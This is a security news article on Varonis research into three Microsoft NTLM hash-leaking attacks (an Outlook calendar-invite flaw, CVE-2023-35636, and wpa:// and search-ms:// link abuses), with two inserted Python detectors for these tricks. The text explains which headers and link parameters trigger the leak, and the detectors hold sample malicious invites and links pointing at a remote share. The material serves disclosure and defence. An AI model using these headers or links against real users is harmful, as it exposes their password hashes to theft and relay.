A Microsoft Outlook vulnerability that leaks hashed passwords through malicious calendar invites is one of three Microsoft password-stealing exploits detailed by security researchers on Thursday.
The Outlook and Windows application exploits can be achieved in just one or two clicks, according to researchers from Varonis, which first reported the issues to Microsoft in July 2023.
The Outlook vulnerability, tracked as CVE-2023-35636, received a patch on Dec. 12. The other two reported issues, involving Windows Performance Analyzer (WPA) and Windows File Explorer (WFE), were closed by Microsoft due to “moderate severity,” Varonis researchers said.
“These were not patched; according to Microsoft, this behavior was not considered a vulnerability. However, we see it as a basic legitimate attack vector,” Dvir Sason, security research manager at Varonis, told SC Media.
The Varonis team disclosed the technical details about the exploits for the first time on Thursday, intentionally leaving time for users to apply the relevant December patch.
1-click Outlook vulnerability leaks passwords through calendar function
Accepting a calendar invite on Outlook sometimes involves opening an iCalendar (.ics) file, a format that enables events and other calendar data to be shared and added to one’s own calendar application.
For example, an Outlook user can accept a calendar invitation from a Google Calendar user, and Outlook will retrieve event details from the .ics to add to its own calendar application.
CVE-2023-35636 allows NTLM v2 hashed passwords to be leaked in this calendar-sharing process with the use of malicious email headers that prompt Outlook to send a request to the attacker’s system.
First, the attacker needs to include a header that indicates the “content-class” is “sharing,” and secondly, the attacker needs to include an “x-sharing-config-url” header that directs to an .ics file path on the attacker’s own machine.
If an Outlook user clicks the calendar invite link (with a prompt such as “Open this iCal”), the hashed password is exposed when Outlook attempts to authenticate on the attacker’s machine to retrieve the .ics file.
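As an added example (not Varonis's or Microsoft's code), the following Python checks an inbound message for the two headers the article names, content-class: sharing and x-sharing-config-url, and flags a config URL that would make Outlook fetch the .ics from a remote file share rather than over HTTPS. The https-only rule, the sample messages and the documentation address 203.0.113.10 are assumptions constructed here.

```python
from email import message_from_string
from urllib.parse import urlparse

# Assumption made here: a legitimate sharing config is fetched over HTTPS, so a
# UNC path or any other scheme means Outlook would try SMB/NTLM authentication.
SAFE_SCHEMES = {"https"}

# Constructed sample messages; 203.0.113.10 is a documentation address standing in for a remote host.
SUSPICIOUS_INVITE = """\
From: organizer@example.test
To: user@example.test
Subject: Project kickoff
Content-Class: sharing
X-Sharing-Config-Url: \\\\203.0.113.10\\share\\invite.ics

Open this iCal to add the meeting to your calendar.
"""

BENIGN_INVITE = SUSPICIOUS_INVITE.replace(
    "\\\\203.0.113.10\\share\\invite.ics", "https://calendar.example.test/config/kickoff.ics"
)


def sharing_config_findings(raw_message: str) -> list:
    """Return findings for a calendar-sharing mail; an empty list means nothing suspicious."""
    msg = message_from_string(raw_message)
    if (msg.get("Content-Class") or "").strip().lower() != "sharing":
        return []                                   # only sharing invites carry the config URL
    config_url = (msg.get("X-Sharing-Config-Url") or "").strip()
    if not config_url:
        return ["content-class is sharing but x-sharing-config-url is missing"]
    # \\host\share\file.ics (or //host/...) makes Outlook authenticate to that host over SMB
    if config_url.startswith(("\\\\", "//")):
        return [f"x-sharing-config-url is a UNC path: {config_url}"]
    scheme = urlparse(config_url).scheme.lower()
    if scheme not in SAFE_SCHEMES:
        return [f"x-sharing-config-url uses unexpected scheme '{scheme or 'none'}': {config_url}"]
    return []
```

A mail gateway rule built on this check would quarantine or strip the sharing headers before the invite reaches a user, which closes the one-click path even on unpatched clients.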
Hackers can use widely available tools, such as legitimate open-source penetration testing tools, to view the packet containing the victim’s authentication attempt, including the hashed password.
Offline brute-force attacks, in which many passwords are automatically generated and tested against the hash, or authentication relay attacks, in which the victim’s authentication request is forwarded back to the server the attacker is attempting to infiltrate, could be used to leverage the leaked NTLM hash.
After opening the malicious email, the victim only needs to make one click (accepting the calendar invite) for their password to be leaked, setting CVE-2023-35636 apart from the other two issues reported by Varonis.
“We believe one-click weaponization is the difference between a vulnerability that should be patched versus an abuse of functionality that is not considered a vulnerability,” Sason told SC Media, regarding Microsoft’s decision to assign a CVE to this exploit.
A patch for CVE-2023-35636 was included in Microsoft Office and Microsoft 365 updates on Dec. 12. The vulnerability was given a medium-severity CVSS score of 6.5.
While the exact remediation rate for vulnerabilities like CVE-2023-35636 is not known, a 2023 report by Edgescan found that the mean time to remediation for vulnerabilities of critical severity was 65 days.
2 other Windows exploits abuse developer tools, file search
The researchers demonstrated two other methods of stealing hashed passwords using Windows applications, which require more user interaction and were not considered to be vulnerabilities in the applications by Microsoft.
In one case, an attacker could use an https:// web link to redirect to a link with a wpa:// URI handler, which is opened in the software development application Windows Performance Analyzer.
The researchers found that if the wpa:// link points to a file hosted at the attacker's IP address, an authentication request that leaks the victim's hashed password is sent over the internet to the attacker's system.
This attack would require the victim to both click the initial malicious web link and subsequently open WPA when prompted by their browser.
Another similar exploit involves manipulating a victim to click a link that uses search-ms:// — the URI handler for the search function of Explorer.exe in Windows File Manager.
The attacker would need to craft a search-ms:// link that includes a fake search query and uses either the subquery or crumb advanced search parameters to direct the search over the internet to a location on the attacker’s machine. The victim’s hashed password is leaked when Explorer.exe attempts to access this location.
This method also requires two clicks, first on the initial phishing link and then on the in-browser prompt to open Windows Explorer.
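As an added example that is not part of the Varonis research, this Python classifies links that would make Windows Performance Analyzer or File Explorer contact a remote host, using the wpa:// and search-ms:// schemes and the subquery and crumb parameters described above. Accepting both wpa:foo and wpa://foo spellings, treating any UNC or host-bearing target as suspicious, and the sample links with the documentation address 203.0.113.10 are assumptions made here.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote

UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)")            # \\host\share or //host/share -> host
URL_HOST_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://([^/\\?#]+)", re.I)


def remote_host(target: str) -> Optional[str]:
    """Return the host a path or URL points at, or None for a local or relative target."""
    target = unquote(target).strip()
    target = re.sub(r"^location:", "", target, flags=re.I)  # crumb values look like location:<path>
    m = UNC_RE.match(target) or URL_HOST_RE.match(target)
    return m.group(1) if m else None


def classify_link(link: str) -> Optional[str]:
    """Describe why a link would make WPA or Explorer reach a remote host; None if it would not."""
    scheme, sep, rest = link.partition(":")
    if not sep:
        return None
    scheme = scheme.lower()
    if scheme == "wpa":
        # Assumption: the file WPA is asked to open is everything after the scheme.
        host = remote_host(rest)
        return f"wpa: link opens a file on remote host {host}" if host else None
    if scheme == "search-ms":
        # Both search-ms:query=... and search-ms://query=... spellings are accepted.
        params = parse_qs(rest.lstrip("/"), keep_blank_values=True)
        for key in ("subquery", "crumb"):
            for value in params.get(key, []):
                host = remote_host(value)
                if host:
                    return f"search-ms: '{key}' points the search at remote host {host}"
    return None


# Constructed sample links; 203.0.113.10 is a documentation address standing in for a remote host.
SAMPLE_LINKS = [
    "wpa://203.0.113.10/trace.etl",
    "search-ms:query=invoice&crumb=location:\\\\203.0.113.10\\share&displayname=Downloads",
    "search-ms:query=invoice&crumb=location:C:\\Users",
    "https://example.test/calendar",
]

if __name__ == "__main__":
    for sample in SAMPLE_LINKS:
        print(f"{sample!r}: {classify_link(sample)}")
```

Running the same classifier over proxy or mail-link logs gives the kind of egress monitoring Sason recommends: a hit means a user was offered a link that would send NTLM authentication to an outside host.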
The researchers note that this exploit has similar indicators of compromise to CVE-2023-23397, a “zero touch” elevation of privilege vulnerability in Microsoft Outlook that was exploited by the Fancy Bear threat group last year.
“I personally believe these vulnerabilities should be considered medium threats, and organizations should monitor for specific and niche communication protocols egressing towards internal and external addresses – as we demonstrated in our research,” said Sason.
Protecting against NTLM hash attacks
As mentioned, passwords hashed by NTLM v2 can still be used by attackers to gain access to victims’ systems via offline brute forcing and authentication relay.
Therefore, Varonis recommends forcing Kerberos authentication in place of NTLM whenever possible. Kerberos’ use of time-limited, session-specific tickets for authentication protects against brute force and authentication relay tactics.
Blocking outgoing NTLM v2 is also a method that can prevent these exploits; although this option was made available in an insider preview build of Windows 11, it is unclear when or if this will become available for general users, Sason noted.
As always, organizations should stay up to date with all software patches and stay abreast of diverse phishing tactics, such as the calendar invite exploit.
Originally published by Laura French: Accepting a calendar invite in Outlook could leak your password